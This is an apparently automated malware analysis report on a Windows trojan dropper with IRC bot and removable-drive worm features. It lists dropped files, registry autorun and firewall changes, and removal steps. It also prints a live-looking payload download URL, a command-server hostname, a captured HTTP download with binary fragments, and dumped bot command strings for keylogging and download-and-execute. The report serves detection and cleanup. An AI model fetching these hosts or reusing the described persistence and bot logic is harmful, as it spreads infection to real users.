Skip to main content

Trojan.GenericKD.2067268_34bede60c0


Trojan.Win32.Agent.amobq (Kaspersky), Trojan.GenericKD.2067268 (B) (Emsisoft), Trojan.GenericKD.2067268 (AdAware), mzpefinder_pcap_file.YR, GenericAutorunWorm.YR, GenericInjector.YR, GenericIRCBot.YR, TrojanDropperVtimrun.YR (Lavasoft MAS)Behaviour: Trojan-Dropper, Trojan, Worm, WormAutorun, IRCBot

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 34bede60c04552c0b0bcad13848048aa

SHA1: e9e2bbd8e7c287ff5656af24136721dde305c1e0

SHA256: 6c4e4620e2ca96f368cdcc0314fcb78c8efdefde4830828bccbe83456d2a1dc3

SSDeep: 3072:eoDuN20X5hzHfUSESmnl/4cOTPfQl/4cOTPfK:e3lLUSHtLTlLTK

Size: 135818 bytes

File type: EXE

Platform: WIN32

Entropy: Not Packed

PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6

Company: no certificate found

Created at: 2014-12-27 16:02:54

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

Behaviour Description
WormAutorunA worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
IRCBotA bot can communicate with command and control servers via IRC channel.


Process activity

The Trojan creates the following process(es):

Cyanide.exe:348
Cyanide.exe:1972
winsvc32.exe:344
Ganja145.exe:1436
NESbot.exe:612
NESbot.exe:1388

The Trojan injects its code into the following process(es):

msconfig.exe:1532
%original file name%.exe:772
hhh.exe:388

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process msconfig.exe:1532 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\msn[1].exe (15430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\google_cache2.tmp (9 bytes)

The process Cyanide.exe:348 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\msconfig.exe (30 bytes)

The process %original file name%.exe:772 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Cyanide.exe (60 bytes)

The process hhh.exe:388 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\NESbot.exe (132 bytes)

The process Ganja145.exe:1436 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\hhh.exe (4984 bytes)

The process NESbot.exe:1388 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\winsvc32.exe (601 bytes)

Registry activity

The process msconfig.exe:1532 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"Ganja145.exe" = "Win32 Cabinet Self-Extractor"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 CA 87 D0 FE C0 18 7D C5 D6 BC 2F 19 D9 8C A3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Cyanide.exe:348 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 1B 90 B5 0C ED 82 71 0B E0 4D 73 C4 0D B0 82"

The process Cyanide.exe:1972 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 13 39 0B 6D 45 02 5D 03 13 7E 88 83 64 1B 48"

The process %original file name%.exe:772 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA DE 2F 50 06 CA B9 13 BD 6A 53 5C 75 18 CD 88"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"Cyanide.exe" = "Cyanide"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process hhh.exe:388 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 17 E2 02 8A 7D 3F D8 66 F6 5E 6A 36 C2 73 EA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"NESbot.exe" = "NESbot"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process winsvc32.exe:344 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B D8 6D 7E 7B AB A8 BE FD 12 70 E7 30 01 AC B9"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process Ganja145.exe:1436 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 04 94 A9 80 2D A8 DC 21 33 F5 F0 F4 AB 84 A3"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"

The process NESbot.exe:612 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 58 BE 2D E9 FB 0D 86 63 DC A2 62 85 F0 08 23"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process NESbot.exe:1388 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 E2 95 EC 3F 2E 23 17 7A 68 08 D3 4D 10 A5 64"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"winsvc32" = "winsvc32.exe"

Dropped PE files

MD5 File path
d6152e2c63bb3e7d4b8f5abf9c76aecfc:\Documents and Settings\"%CurrentUserName%"\Application Data\msconfig.exe
d6152e2c63bb3e7d4b8f5abf9c76aecfc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Cyanide.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    Cyanide.exe:348
    Cyanide.exe:1972
    winsvc32.exe:344
    Ganja145.exe:1436
    NESbot.exe:612
    NESbot.exe:1388

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\msn[1].exe (15430 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\google_cache2.tmp (9 bytes)
    %Documents and Settings%\%current user%\Application Data\msconfig.exe (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cyanide.exe (60 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\NESbot.exe (132 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\hhh.exe (4984 bytes)
    %WinDir%\winsvc32.exe (601 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "winsvc32" = "winsvc32.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
  7. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name:
Product Name:
Product Version: 66.72.12.25
Legal Copyright: Copyright (c) 2014
Legal Trademarks:
Original Filename: sokidsmfsdfsdfs.exe
Internal Name: sokidsmfsdfsdfs.exe
File Version: 66.72.12.25
File Description:
Comments:
Language: English (United States)

Company Name: Product Name: Product Version: 66.72.12.25Legal Copyright: Copyright (c) 2014Legal Trademarks: Original Filename: sokidsmfsdfsdfs.exeInternal Name: sokidsmfsdfsdfs.exeFile Version: 66.72.12.25File Description: Comments: Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text819249252496644.345740480df25e05b678afc1c4fe541b6f140
.reloc65536125120.056519bf805fbb74b19f1e2e0bd1f15591e752
.rsrc73728258830722.540195dfb93c34d83e1f1621fa635f022a43e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:


Total found: 1
0aaed1ed0c5752822e49e2fcac00792d

Network Activity

URLs

URL IP
hxxp://icetelecoms.co.uk/msn/msn.exe212.1.215.86
root2.zapto.org90.147.119.154

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /msn/msn.exe HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: icetelecoms.co.uk

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Mon, 12 Jan 2015 12:39:48 GMT

Server: Apache

Last-Modified: Sun, 11 Jan 2015 18:17:04 GMT

ETag: "5b50f11-28000-50c64659b4208"

Accept-Ranges: bytes

Content-Length: 163840

Keep-Alive: timeout=3, max=100

Connection: Keep-Alive

Content-Type: application/x-msdownload

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............C...C...Cu..C...C...C0..Cu..C...Cu..C...Cu..C...CRich...C................PE..L....Q.H............................\d..................................................................................................4...........................0...................................................0............................text............................... ..`.data...............................@....rsrc...............................@..@...H@...,..HM...,..HZ......Hd......Hn......Hy......H............ADVAPI32.dll.KERNEL32.dll.NTDLL.DLL.GDI32.dll.USER32.dll.COMCTL32.dll.VERSION.dll................................................................................................................................................................................................................................................................................................................|.w.|.wj..w.r.w{y.w...w...w.l.w...wBx.w...w.z.w...w.C.w......Dw....iZ.w.......|...|...|...|F..|_..|zO.||N.|.T.|8..|l].|K..|...|...|.).|...|...|...|...|...|l..|.[.|n .|Ld.|1..|!..|g..|.N.|...|.(.|d..|i8.|.`.|0..|E..|...|...|YM.|...|...|...|...|<U.|h!.|.`.|...|...|(..|S..|...|...|...|.P.|n .|;..|0%.|k#.|.].|.-.|...|...|...|...|...|#..|...|1..|...|./.|...|...|...|...|...|...|j>.|.I.|...|{..|...|V..|...|n..|'..|....u.E~..A~..B~ .A~..B~..B~].A~}.B~..A~..A~@.B~..B~..B~..A~..A~..B~..C~nCB~.BB~k.B~..E~}mE~V.

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

msconfig.exe_1532:

.text

.text

`.rdata

`.rdata

@.data

@.data

.reloc

.reloc

WS2_32.dll

WS2_32.dll

URLDownloadToFileA

URLDownloadToFileA

urlmon.dll

urlmon.dll

GetWindowsDirectoryA

GetWindowsDirectoryA

KERNEL32.dll

KERNEL32.dll

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

RegCloseKey

RegCloseKey

RegOpenKeyExA

RegOpenKeyExA

RegCreateKeyExA

RegCreateKeyExA

ADVAPI32.dll

ADVAPI32.dll

VkKeyScanA

VkKeyScanA

keybd_event

keybd_event

USER32.dll

USER32.dll

MSVCRT.dll

MSVCRT.dll

_acmdln

_acmdln

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

PRIVMSG

PRIVMSG

pong|cmd.exe###

pong|cmd.exe###

udp.stop

udp.stop

rndnick

rndnick

Cerebral botakeylog

Cerebral botakeylog

The One botspread.start

The One botspread.start

Skid placed botsregsrvs.exe

Skid placed botsregsrvs.exe

Older Botschngnick

Older Botschngnick

[FTP]

[FTP]

[Botkiller] Killing Process "%s", Type: "%s"

[Botkiller] Killing Process "%s", Type: "%s"

explorer.exe

explorer.exe

EXPLORER.EXE

EXPLORER.EXE

winlogon.exe

winlogon.exe

csrss.exe

csrss.exe

WINLOGON.EXE

WINLOGON.EXE

services.exe

services.exe

SERVICES.EXE

SERVICES.EXE

%s\%s%i%i.exe

%s\%s%i%i.exe

%s Downloading File From: %s, To: %s

%s Downloading File From: %s, To: %s

%s File Successfully Downloaded To: %s

%s File Successfully Downloaded To: %s

%s Failed To Download File Reason: Insufficient Memory

%s Failed To Download File Reason: Insufficient Memory

%s Failed To Download File Reason: Unknown

%s Failed To Download File Reason: Unknown

%s Successfully Executed: %s

%s Successfully Executed: %s

%s Failed To Execute File via Create Process Reason: Unknown

%s Failed To Execute File via Create Process Reason: Unknown

%appdata%\lsass.exe

%appdata%\lsass.exe

Hola,2012 el fin del mundo ya comprobaron que biene un meteorito y no han dicho nada.aca puedes ver unas imagenes de la nasa de los lugares donde la tierra se esta deteriorando, solo fata un a

Hola,2012 el fin del mundo ya comprobaron que biene un meteorito y no han dicho nada.aca puedes ver unas imagenes de la nasa de los lugares donde la tierra se esta deteriorando, solo fata un a

o.informate en el siguiente enlace

o.informate en el siguiente enlace

BeeSwarm.exe

BeeSwarm.exe

MAPI32.DLL

MAPI32.DLL

*.html

*.html

%s\%s

%s\%s

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

%s:*:Enabled:%s

%s:*:Enabled:%s

Software\Microsoft\Windows\CurrentVersion\Run\

Software\Microsoft\Windows\CurrentVersion\Run\

%s %s

%s %s

%s %s "" "TsGh" :%s

%s %s "" "TsGh" :%s

%s %s %s

%s %s %s

%s %s :%s

%s %s :%s

%s :%s

%s :%s

ganja%s.exe

ganja%s.exe

%s Updating to: %s

%s Updating to: %s

%s Execution Failed!

%s Execution Failed!

%s Dowload Failed!

%s Dowload Failed!

%s Has Been Visited!

%s Has Been Visited!

Windows Live Messenger

Windows Live Messenger

Ganja%s.exe

Ganja%s.exe

[Download]: Executed Successfully

[Download]: Executed Successfully

